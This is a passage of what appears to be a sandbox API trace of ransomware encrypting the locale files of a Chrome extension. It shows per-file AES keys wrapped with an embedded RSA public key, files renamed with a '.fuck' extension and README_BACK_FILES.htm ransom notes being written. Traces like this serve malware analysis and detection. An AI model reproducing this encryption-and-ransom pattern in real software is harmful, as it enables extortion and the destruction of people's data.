[0255.680] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0255.680] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0255.681] CloseHandle (hObject=0x5d5c) returned 1 [0255.681] CloseHandle (hObject=0x5d60) returned 1 [0255.681] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), bFailIfExists=0) returned 1 [0255.685] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json", dwFileAttributes=0x0) returned 1 [0255.686] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.gsg")) returned 1 [0255.687] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.fuck")) returned 1 [0255.688] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0255.688] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.688] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.688] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.689] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.689] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\readme_back_files.htm")) returned 0xffffffff [0255.689] AreFileApisANSI () returned 1 [0255.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.689] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.690] GetFileType (hFile=0x5d50) returned 0x1 [0255.690] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.691] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.691] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.692] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.692] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.692] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.692] GetLastError () returned 0x0 [0255.693] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json")) returned 0x20 [0255.693] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json", dwFileAttributes=0x80) returned 1 [0255.693] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.694] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.695] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.696] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.699] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.699] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.699] CryptHashData (hHash=0x2e180e8, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.699] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.699] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.699] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.699] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12c40) returned 1 [0255.700] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12c40, dwCertEncodingType=0x1, pInfo=0x2e2a7f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a820*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a828*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e190a8) returned 1 [0255.700] CryptEncrypt (in: hKey=0x2e190a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.700] CryptEncrypt (in: hKey=0x2e190a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12d50*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e12d50*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.700] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e12d50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e12d50*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.701] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0255.703] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x150, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x160) returned 1 [0255.703] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x160, lpOverlapped=0x0) returned 1 [0255.703] CloseHandle (hObject=0x5d60) returned 1 [0255.703] CloseHandle (hObject=0x5d5c) returned 1 [0255.703] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), bFailIfExists=0) returned 1 [0255.707] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json", dwFileAttributes=0x0) returned 1 [0255.707] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.gsg")) returned 1 [0255.708] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.fuck")) returned 1 [0255.710] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0255.710] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.710] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.710] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.710] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.710] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\readme_back_files.htm")) returned 0xffffffff [0255.710] AreFileApisANSI () returned 1 [0255.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.710] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.711] GetFileType (hFile=0x5d50) returned 0x1 [0255.711] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.723] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.723] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0255.724] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.724] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.724] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.724] GetLastError () returned 0x0 [0255.724] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json")) returned 0x20 [0255.724] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json", dwFileAttributes=0x80) returned 1 [0255.725] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.725] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.726] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.727] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.729] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.729] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0255.729] CryptHashData (hHash=0x2e186a8, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.729] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.729] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.729] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.729] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12dd8) returned 1 [0255.729] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12dd8, dwCertEncodingType=0x1, pInfo=0x2e29060*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29090*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29098*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19728) returned 1 [0255.729] CryptEncrypt (in: hKey=0x2e19728, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.730] CryptEncrypt (in: hKey=0x2e19728, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13190*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e13190*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.730] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e13190*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e13190*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.731] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x115, lpOverlapped=0x0) returned 1 [0255.732] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x115, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0255.732] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0255.733] CloseHandle (hObject=0x5d5c) returned 1 [0255.733] CloseHandle (hObject=0x5d60) returned 1 [0255.733] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), bFailIfExists=0) returned 1 [0255.736] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json", dwFileAttributes=0x0) returned 1 [0255.737] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.gsg")) returned 1 [0255.738] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.fuck")) returned 1 [0255.739] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0255.739] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.739] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.740] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.740] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0255.740] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\README_BACK_FILES.htm" (normalized: 